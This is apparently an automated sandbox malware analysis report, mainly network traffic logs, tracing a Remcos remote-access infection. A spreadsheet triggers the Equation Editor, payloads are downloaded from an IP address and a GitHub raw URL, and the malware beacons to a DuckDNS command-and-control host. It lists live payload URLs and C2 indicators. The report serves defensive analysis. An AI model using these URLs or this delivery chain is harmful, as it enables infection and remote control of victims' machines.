                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.134.140.68:50312
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 45.134.140.68:50312
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 45.134.140.68:50312
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 104.168.32.148:80 -> 192.168.2.22:49174
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 104.168.32.148:80 -> 192.168.2.22:49174
                    Source: Malware configuration extractorURLs: ramcxx.duckdns.org
                    Source: global trafficTCP traffic: 45.134.140.68 ports 0,1,2,3,5,50312
                    Source: unknownDNS query: name: ramcxx.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 45.134.140.68:50312
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /550/RWEER.txt HTTP/1.1Host: 104.168.32.148Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: INETLTDTR INETLTDTR
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: global trafficHTTP traffic detected: GET /a9ifFT HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: strmr.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.32.148Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /550/nicepicturewithyourebodygreen.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.32.148Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.179.215:443 -> 192.168.2.22:49167 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.179.215:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49173 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00426D42 recv,16_2_00426D42
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1361791.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /a9ifFT HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: strmr.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.32.148Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /550/nicepicturewithyourebodygreen.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.32.148Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /550/RWEER.txt HTTP/1.1Host: 104.168.32.148Connection: Keep-Alive
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: strmr.co
                    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ramcxx.duckdns.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 10:51:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsvary: Accept-Encodingx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yw39Eg2AjedQvQNaFnUkaqi8qNdKfnqcb0snPBg7%2FrmnVXmuuZKzrY8E1QBpyYtZ2hdTfMGl0xnnGAr6wwOmuwhZ1BKa6aKYCJM3e%2B6qIBDzV%2B0%2Bu3PXE2BAEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9af0a0485543f2-EWR
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 10:51:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsvary: Accept-Encodingx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uOQy5OWhwgAEDA6b%2B9DSXraCaEiJEQSggwDrBIvFBooBZvd8XlHkEQVagDaYxLSdTVeyiJOF8F3AaQS%2F5Fbu7XhkizjwyA6ucFyjZ3NohOo5rKM%2FIMPrMeqdQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9af0a5d895c332-EWR
                    Source: powershell.exe, 0000000E.00000002.473571085.00000000025FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148
                    Source: powershell.exe, 0000000E.00000002.473571085.00000000025FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/550/RWEER.txt
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 0000000A.00000002.450753923.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/550/nicepicturewithyourebodygreen.tIF
                    Source: EQNEDT32.EXE, 0000000A.00000002.450753923.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFFtnp
                    Source: EQNEDT32.EXE, 0000000A.00000002.450753923.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFVtnp
                    Source: EQNEDT32.EXE, 0000000A.00000002.450753923.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFj
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: powershell.exe, 0000000E.00000002.475873710.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
